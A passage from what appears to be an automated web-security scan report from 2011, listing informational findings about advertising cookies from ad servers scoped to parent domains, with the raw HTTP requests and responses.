PRpl=|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:35:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4400
Set-Cookie:PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmVlODIAEcCDe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D9A20400-9495-C8E0-0309-8D40011C0203; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKLC*1774:1|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKLCAA2c:1|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FKqE:1|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKwo:1|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FKqEGKwo:1|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

10.8. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-1268392-317325-1198035-1049794-1238051-74560-1086373-1196055-1264419-593881-1215295-1086372-1086371-1086370-926097-1086369-1196051-1147048-1049851-1063912-1063916-1166710-1063911-1063910-1215322-715901-1023315-725071-109108-75921-1006093-86237-1006089-1049785-1086731-1049788-1086733-1284585-1044410-1077940-1093100-397181-1044578-1041270-1049769-596293-1049770-576685-1044587-596291-1049772 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; rtc_4-db=MLvn9jM1Jgpr54aeixlPU0iJzD/A1gw/s7z5FPHjTbcjQe6SyjZfNBHlcl0kJ6xb7KxXS0n/wkRC4loA/0F2wkRHZcOAJEq4Dwzt2Om/1LFFe33wUlIYHWgk3JIf+57YTIrZsByUWltzFrRLWQkJwcRM8WAjEeY4ROXqVRqWqlFCk3HzeZvB7UqDKiMm+em65LEdFCubQva+uhYCU4TAdQsM9NhX+ug+P8ELz2+3GiBBzM1wCymg8+GPH7Y69+xviE6Hqdz7ujIwlbK5VxRJUDXsPScW0OuLen2n5XNIVQWV0a6zZscEKSvJFJ+qcEq4+Z9S+ATaANDLtiqSIrA0MATfpgfCqefcfJ5CLtyChbBOQcNQdYq/ZTXHQ2nKTygG5ksEGSLhhMLTH3nLtfSmf7myMaOLY9aJ02OHl/Fu6Y2wQS84P004/LHAfRc/BEHwKgDZY8E4JJEL71uMwA2eeEdPVYKPG/DduFctll24uU8j2YMNsWENRh4hK5IbB0czI2gWw5thigBcBZIP3XJrVHNnhsObnvvXwCKWWfWdYI3v4TRgyMWKw6d8zcNUriJHuzJ6gN4inlSjVhNBgUR06cCYuTzRv8kU21/Nb5c0ZNbuKLudEWUgq1+Mw5po5VTwWXV0xjFGISH481xxkQrS9f+z4zfknHQSyR966h01FYMsS7zsQtcKlrarNO/PXZK/VVXoeRIalnaoFkvriwrBt9uojqEElV6GOWaCOj9t8u2MX6+ewAiFR8qEF4hCbHQN2w3i7zZxx9jglR+zktHHdI+AaME6nwVOuSWRSMmbBOJQiBGVEKcZZtrixm6A0EkvkXGQhi1mkiDJt28P6lC1YPWnqEjsa1VFxuyj6OhVtpRJH+e2y6R4/cnzJ+CfcLnbecp3jLkBN3A9WKkj160OlWZ6bQrrtnaiNyLK+hjDarrW1/e7DkcyYpLMH7VZ0PoS679JljmXMuDgV63vGcd/l2Xeq07wDl5+804DPNFxxXEWxZK2JxenUyorOZ05lAucMiUYnwDH43x2r3zq4+jzvmUOijuNnDDQC6c2U37Xp4k3g6we4z0Ry3aft2vhGeNZfdQa6KWZJbHpsiIPOCcIXMd7rRsTytymDxbBcSdJSOF12B9Pjw5Zd4nETw83mqHLJNXb+avDtVTPJTZvtMw/WF863sU5PyifACD+WfVm7plRes9cpmKCPcJQ7KvRISbVPTZwwZPbZ+ibDRrmqQ75C3n12yoLgcMTFwwpUXIE8ayLlistW77NupnYkEPzdtEpAoN9Gh3vRGfHy0oQz19wzUQqJlA28pDJ1tX/7iOBCPg6ZY5H+poLDVjrVtXfWnmVV69M+2ceRBwsL9kP8Sh4kd0vsFLne73RkEScWjpHV7/ppEg88FcDKahaMhEZyiRDsKA570XuyQw+UqP5VTXr4GySHBYP6zLT3+/tCziDDi6NClG6rdihdMlrm4QYe4xpq3GPbtAWr82gHnL3YXN2W2EYYdhilT+MNpndsp7h20igjE/HbpSLspAok9tNFXqbEYlOwELgS+lv9Ifkr2X+d0pgrqiQQ0d9l6fgzE+vTxRX/lSqhrDbZ8AP5hPvWP8yU2CWGjyJOp+IQMzxLbCeyMUCOswZyF9Szp3O3Ji1sOZtE3XxCc0gQdRJoaas/cK6jDrj+Zn0IMRafowVEGLGJ68i+1GuK1MUVVnvoLFt0mEIVuYfpXQ0Ox3EP6fd4MwQt7ZSlCzlXGh+Uyu5r2kFhlZQi9L/2q/8uNAomOxLyyaFNZVc6DYQZk9rPmOUl/1BLQsf1hbETMCwzqBObuJhhJm/LMoMBrGq/Uo14rgZ/IiEUZxD2wQsnkg4zyIS9BU59fSAJXFKHCXXf9N00ud61sG4DWv4Y9jKKolUZ0s/uTUq3gugjF+d; rsiPus_j6zu="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt57xKhmoM8agSQamtihOB9JrGlJ9U5Glrv4IwkOYq8vCgKRqJJ2Vthfh44y9doeylTKKNxTEgwZ0tUDW2eYv61AYwLDVnDfXLH7JG+gLUN2cyzNQmzFkyZrPBb09ScoTgIFKy+VzvZEh56Mot8j1jmS6F0EJ0Vd56aXqpwHitTgyFZ0Tgfsu6X72q5G4VqGA5WmkzkvyYbs9U5n6CfnPViCFHLgmTHka96/tVahWRDt+loXAtoEMCIAILvAWLMdVxULh2UAJrAJ7WH7YfvuXvv0fAWzeVorhAZsmDTeEs+vxwXkO9CyOpiXO89nCPHnTtutAk8luR+G+tifbFHAuAlHhRjFMF5keF42fRwUXnDG6sHRZKgIgNuGOArxKB3mvKLeJH8yR9yXNasKO6go652tWyFs2CQkdF2IMUDU3eSKAct4pjTs3IEFH9uwOqVrCCo+x1ir8vTa+5USm1joacLN2msLrMgH18nZ8DvKXNuOCPyclG9Vmk/l1oicJDWZA5jjIK6w2jWlTN/p6SbP3LZtOMiwOj6U2fVgJJqaGYY1XMY0zku7MaQjyGRAtY+ZmU/DCzMw7xsnRfKOnn4m7xt8pKSSoGAniMLko210UfG+T4Tts4/UAmISYbuc9YPfsE3JnJDCCMrSL109EjE41WyWul/8KbBdqdKc4gBhkZXCS9G90FIrZAyESpQq/u/4lcEIiEFEMm0kZqmDjg/yd/rP2bUoesg50Qqa2bnSXTtHOZkySNUg7o/zripht/uuixLWgOWZEZEFg9BOvDt1hV0YeRchLnulIDchNxF/d6Dfdk8XUO8zh4yhRDxxy4kVbxFNxFkXuZLttj2yEfnTXhDMnA2QMt2uMwEh/5A2d69N3djka9cbMFEB9JYW8npVgr43K+Wbhq6yqAjliUUHpKVygERKwWrweJbTkcSpXGiZkU/s5ijv6Lcnfu20OXiNSXZ5Dnmd0UlnP/Q/j5F/7Vfe6n6/KR+B2h8T59lJFwNQz/s8wVhZfIdPTxpWqh9S8opaQqUxN7gCNpeF6U7dw=="; rsi_us_1000000="pUMlIz9HMAYU1O2uQ6agQvHto2eq75IgYszgol7C7yspOc4TfCNog8fILX1SZNuyWxzrk3bzeF6RGNsvywqVnLs8ZV8tHCwYDbDnHA9KDGR/2p3ZsUoP3QRkponkl0tHXd2tnn1ll9D0gxCO31q5lA44TjimSdK75IPGwn80EAbmAkiEQ1NW8r9XVazY3Aa0ZgQI7CeIdRzQV+8YwH7fXhzTAu6r7VYossSs5gGqRRy0tpBoZB/n8X+efR1dF/rfrSrFfx6P0rWcNIb+ahHrYGLlC2ihfhPP3O+Jvl7SsuEFIjV5F5W37w+Ngl7n1EDps4hxEBHOYnDC8jfXtjV7LMICIl+BeVVVg+dlJlFsYNcPuAi/lwJ2RUK4qNzFKTfEZf2NdPTjIF8m7bq4sfze2kt2X9cL2By0nkTggOA8Rhhzk+g02M5QgiowKy2VuivgjHrAHKifaMb6++L27UZKtgs3/H69LBeRmX/ruNTtaGvPlsWGez8YcjoTSN1nViHeDdA94hHJh7PuPZZI0FkxHCCuo5QSKQGFFpqHzYtYPuZx5AYJ0ZRcb1UbdMNL+UHbpCU3ImHbEfOz075jyEHLXIpy65u7NnuOhH7A2gUkqI8X869fYQ7B1PLibiaYGlGkugk76lf8FDefFHxnOhkvw0h+Zzi+7/dVfgUbOEjTKhpv8IuitSf7Ae9warLnboKUNf9z/Uv4+KpuTET119I7oG19H8uhClb70f1+BNWGmCSFQO2fX1KpA00LffkrjsQRk0fqmCqz8hrPblcR84IJyr8mZUI+xZrbX1PRxebOx8WR81e+wVQrYJ64tbGSgM4dF4irZ5SazLYqeYju5ZkzoeeUqC0kPbhAYgXhRly6dV7AqFIWS7jp0JwuTqrMqX9FMAN0qDaJWtIevOCSal5ifcCn+r/i4thjnRNLFwTLVesGnSkyEJZ/sE2T89wTG0ZJZHwH2IIscMcArFiwk0zpa/zAt7BLfpfURhHVmWEmP9mD9URaYMTbBDCOD5qEEZg/WqwhHpBOXZfhIVqtuOeQW9XH4qQsjQTzfP3Tfjh5pZkxtEjOQg0vnGuPeeVK2k47liBgtx602AH4FsuDCNPPnl2N9S3b6Se9s4QGIrVR7cibb+oLlJPhtv82E2AYb2JqcT1MYT/epHc2tSTheeVbvF+igVHOQxLLqbwLbCwkqsV0hbi2fv9qScoJT/WzFTlFzDm61B6UYYmjpsQO0JkUPGWXH1lhIwYgW601Wju2wHcWJJoprlhGo237DLuozEfVATLqnMZx4aFkxiOnaeNV3saNTaTVCH9jTzgAYcB1OixE63aW7kHNf9yyuG53mJ5Aa8s0lrI3uvr/+vFPkMcyppj8vriy5viseKKo/bztHFB9LEOYHDPRIwAioNiOj1brnge8EsnFDr6aUX2wryxQ7tqLBKTr/wvXQi/1S0CrcSEQ4vw1utWrEm7wHaaSRnn8GhOAyMwnrmXOwJ/gaLrP2p8bLBIxkr/8jxUvF2Tm6BsO7OU5FitN37LNXKUpVsA="; rsi_segs_1000000=pUP148OheHIQT7uItGF25jD9Qs21FubrqKatUkMCrzQ0ubO+9OJEqMBPaqLOnUT/0qbgJHZjnVOLUUdh6W5yO8TAHKWrnEIdrGwwkcb4cnFgczDjCdEcEfCAH9QV9gQfhWUU9eUW+1FmHy81movjmb0OshD6JD75y82v21Zpze/U7TG71KUw/EK8Yk4YFbDkYA9y3wz0G7nvTcfLT/GhJZbKN+yRVh6IJYpuMdXAy8638GeZS/vL4PGyPCK7mYGQ19yvvEn6ODRVpB63vByr0ab/JGpwhV2j7V2Opbn62TlTV9Ep9v/KTJXEEh7xjIfNol2mtVQjP2qXlQ+5DYZWBRe8B3uT46yKVM63Ue8Iu5VB+nAPlUpvE0jiE6Qs1H1n4r/e/jSmPGPvWra/g1Iw52oGpr3tDAShXZ6leem6wkl7YAlKXY0ikpCZDduaQh8UBxHMax7jHTGLCHPzt/9KYUF1eK3tc2bRu/gWIv3wnbCQR0aqAnlKC5c4DCTSJDvyAlCmhJOuf6ulIfr+YiVUcmyunKjbPTY9z5DoFVXvb00tKIO72DJ2R8xXrHfHLknf1Ii54LJ0bnhi+0Drv+J010Vz7CoOOk2kLw==; udm_0=MLv39C8JZjpr557JwPKJHPJjVm4nwNDnfaGGn5a6X5EAwsYAqmLCTArLHxzvFq5u+Lwe27lFrnW5WnLyYnzoo2vLyODpQWYkRuTiRRYobugWhdDPREK16g3CZk+J188bp8ISFFatAM3Pns+SxZjcme0C5dGxc6XjkDqd2T0pa9dLHJ2FzI7NAP8Y3TWU6n79EJfmzJu3rY1n/+9COKH0vUGz5d+gBTEXGF9NJj5hemDBJLfP5Mve+4eWzxiCmeffHI22qESrtLERd9bn/jcndKQB6uiKK4So7g9BbnKF0XRvZf92uEkD8qlmEHlK4lIeI2xMlprKnNbUbSb3joEj3FnW5JiRUPydReZtf6pQR8m3Ri7k5yDwmeNfkO8orvSZb6NKA+T1I2i2V6XQzYiQYT7eMO3GqA60kr6kRwLqPUZJh32H0PqK8oG4V09T9ctbP5mf0Cpnf7vM/uRm82tz4tfks3zBm+3VbTk8I2zhyWS6eclEJACmrM7XMGAWGJq9IYqsF5S5jpHtbcXPrz3rT2u/LIbFzVO89TolW1hVi5tuk1KUABx5m8qzMPhX0+EPauUMSwzeirm98AcAwtXpvonBgEzaZNv2Urt4Jvxfo27TOyFVxFu1bqmEB8413oNdEsW2gdv/YdJUYkcRYMX2OouTQyfY7vz4Tk1pzbkZa4TH2fiVXxOBEHyM1PbD7qSJcQNPo/dKaL6Xo4fqVV4AgIYlpYTjce9ZivcrOnjpRG7y1agYfbTDamrwnGARUfl6KEBM2ZiTeG2Th7ZCT0C8b1UsKmbxGVTaXBZ0wNsjxp+YZtltZqx3sMJbKGl2M6JUT6+b1g+/D1somt33fPhno2ShrlBRxI6Xv1/126vVfr+8VkGpzsDKbLnLLRElobnNFfygMUp+MSlGp0ZpUXAvzJAJe6qk57o+tkwtb6z5N8ucTzNpi24DHsutM6dmIDxOQAEglp2zZKqN9AIYM1hElTbq+zc2ohzuOYi/5VTNmVJFdmfV8jGoZvYmCAQ6vc7v/bKs8HK5EM7lr6YKr1a2uMELEu4ITAE3gqlVLuvjVYDva/Vyw8YXKa6Rcxml6TjwSCRaUcVyyk4zt+bzX/O5hCc1ojBZDEcmWPNvSp54wrCDS4hVeNiCVinCDJG6X2Bjb2NCbb2UOFUa6jFXwyrlYAC2eXfnV/Mp/ECcH1f7yr2pCGP+gzOfRcb+maYO87HFqFqU4o0hCg0HRA0UycAov4CmqZEBFk9dU8+gDkkPGgmct04RsyVbsrfpoMoCycEvYtBXhDyOthaY+BDkp+ARJu6+rQnmkr7eDZA/vxRM/N95y1VMmE3Myc7FTLdYW9C2xtVHZuzUtN8T7qcO9QIsvEkMjKo+DNeeo4pM/11JcWfLwh92IBgieCHi9XyUEKsOLp7OEC8kbLOjAcAIQQTa7WkkQG8T3O/kM3JB9V9uND5mY70Sow7PaIYpx0O7Aoith2eiECyyl7+6y5j3d22MjOVScy+6Y7Ldz/U1I0iJwoYRzcFyf2mcYOebzis=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_j6zu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_j6zu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SkQn="MLsXrqEubghv55A4WwmsZyXO5VhPENfdPIyyQLscELmCG0fTLlTekGbINSJmbIu0d1ubB0nyDTyxcOmdBQabZa45Jb41Tm7kSmB6OEnhTApzesR7XuknUQy48mrMwW5onYarHwBNKshMKjS5CCO5r6LK8KdPXJ6XR1DOuBII8Z2GlRuVWNK327jftnuLNSMdgk9+E5PT4cn0i7NwkYa/qtfcSS1y5BKyvIC54WQm9Vhjo/KWdDnA2SF0GED+RMilpW+j8TZ0JhRT/1WQzqA2Jk0RG+DpxhutzssDYSYk0DX3DgdnJjR2axK/qoDvYQ9yQ+UxBg9ngxYHKM1ftmej/RgXdE6O5FS1L8pF8Jo6y2rR2Bb/YX0L/Aq8i0+dVwmeO0lIGti11L3qjCxH9wBllNaocACV9BAE3PxtWLtqfpUBnXnxdnekOdqTIBMbGlgJcBaapslAmwdjmRqmdxh/pnnOlysVOcfkOdUemgTzO5+wdqYzzV6LvgLRwb4hO3+HUJS4YtIGknuktPToYoE3w2wKJnhncNO703XIDqnj9j90KxMSkws1tB5FJ6WjYwJIziEBYUlfxiWZHQtlHa2pRIZ5S9/Gi/ZIeb98XxEkakK9w87x/JBldFW4WcgNWd7XtzKIWRqc+i++6ovbZ4wDQmS77gB3/rP9/myJT61CHZ7jQ4epQrHqPzcJZngXL/qJ7yyEs1nRnTefyPu/bSboSw5TVMWO/Ww5cVFQn5rwqSJeQKWR3GHRJxbYV8bvVWxpkzja+ks41Gn+6S7sam3OWyeu4VImQLc4n7Gfk6nvUkOCJFIrMFLG/Y4b7S6bCzFfRDotAXon589paelpafKrOV5zB30NQcdANZARkGvAzxxDn2DbmX5JHlL44F1UPI+VMU02U5vHZhZ+2U0bUZ/06/W3F69PZ35ywmxYrqVvTMenmYMnbyBPFcUYiCeye30lPQ5SqUBa9LeWpKvYnFxR1EEoN1ZkHAun430QzoW0dXnSBhx2gdS9oRHvcztz8YfN5Vyrssqhuuf69u9UcWYCJo365C0PxYeGC0MlAuhLXSiY3oAp9fJmGwgzUczzg3mmBk+tUKO8Iiw92/sqIQZ8EjTozsV6s4wu1prwzQljTlTABvFXBGYpUROzA7gEhHK9zsJRnrfKFZeQWhq3Ud4="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMtIzlHMAYY1A3HkAz1jwtCTPvDvwQSU2eqPpzA6n4Wsm7TKYqfaBLrtKN68iFx8cqmHSK9eaFvyn1GBw+6JWsXYG7aiq5FNZQFDVoCY99WgD0ZgDa+0zJlpokW8XVCy6y+Du/jrPBBg5yM3rO4tbi0Jl6FICf37NqIiuoMM7wt+E/z+22JNFn5VC6+LZSDwDXQ3As6Hl4R0C88RDVi9DAfBOxCVcg5yQKzAzoJIxp5/DJhO+ECGd/+VhmnIJDcusTsL/Ap/dyTs6piINyXjT7GuUPfT5sWHu2YkGLjgFzp+mon0GfRWbMg5jjBb9eSoO4gqfuNwaHf8ptc5OMhhuoyIzauw3c2jGIJcGLi77azqNo8SRMj2N82tZoGqbdg7dvPzygrnlSHG02v6+PV+3yxUC+fY58JeHxNBAkt1Z2as2mV+DknpMJbs5WCe0o8nRRpDdzhrMEq2mXkpOUsgKnKP1zw5h898+qPYuRBNcbUL1GyI7Kw8tiOs0erpnIilKw6JJ3ZGnP3lU7HTdrglwGlxfvR+i6XUlKbq9lMO+OvTy0Pcq8+dXMiy6SxCttj0c9iVhgTav+qok/isEHRdALDF8Qc97MCaA5xhIpv2nth2l8UJ7TzAZj633oH3fd1GDzCmvqoctSZ91Z+qQoLRnFNEaqi8MjJYRYtz42KTrVXBKwLiXioap9Dw7pICla4/bAo5SrutPrAfFFXUxRjihk3ZRQijldc8xotPMoQVqj60x9i+mrzLwL0gE0tBVsImrybLZ7cq+QyYtg4YvKXUPEntPGi24XXFKvcdyEH0pys/E8pLx9zGCMAdo35gx6qg0EhW8r75pXR8g/iCUAgT4Ks9CAoGJE3Ej/dqvUUtXxeqgQ5ujM6Ql1mCM6/Qwxxvl0q9cZVDajvuH8CXXCwpRLVa+OCcXeJpI3Bzv1cBc743BUSdU0eMjMbkXv3VEDeAbmyxTziyoDjEfObahoaldHBm2FbkZAHWmWwcKoZMW8bSfkBXNW88kI0pKCI3gt6GBKRyUXKnEUIWIKiQv8K0HbbipZoiOywSSTtfMOB5mSO2FOJScnRmCunBEV3OgweYapkOV1QTyVMZzdpn/ZgLnDJQwLNU9sW63LNFn6KcyHPv+UdBN2JSMlBacJbjngzZAoZ2z4hcit/z/YYXAdElJSigG/O066A3v7P93u5ZLmjRgSpolAYtQK+I/TWM7TOmF15H/4IsxoGttVOM7QD161vTozUBNqEJM2B/HoSS1gv0+Uet9qQR1Ylglrlv8OJQ3GLrgMmJ7YIIpI8YZ6ZcTj/ejn8Xr/oheS3pPKW3XCGoEMvfwQSYDDA8WM2Me0JlwRmNco3nJZ1V6EyQnmuW97jvbUJH+hdHrNqs3+rvk0CMNlVozZwZ47hsIo5uhYVxlxuIbQ3OWkY+ThNpYo9VGinrVdSpKv4fGKP54AiUAu80v5YTmlIUjAkak/caUN43koojV709araDbwrHbxdd11CU+4m/VIHUSzXzbrwAdHDLsbqZexSKFUyafb0JU7qWtt9UqZmQnJDr+MZMGP5x6L6liPPC2MSsBCF6KS3gl6dM1BjDkh0F7BUKvf5ijzqj/inPq5b0WogbtOM"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 15:38:32 GMT

GIF89a.............!.......,...........D..;

10.9. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=J06575 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
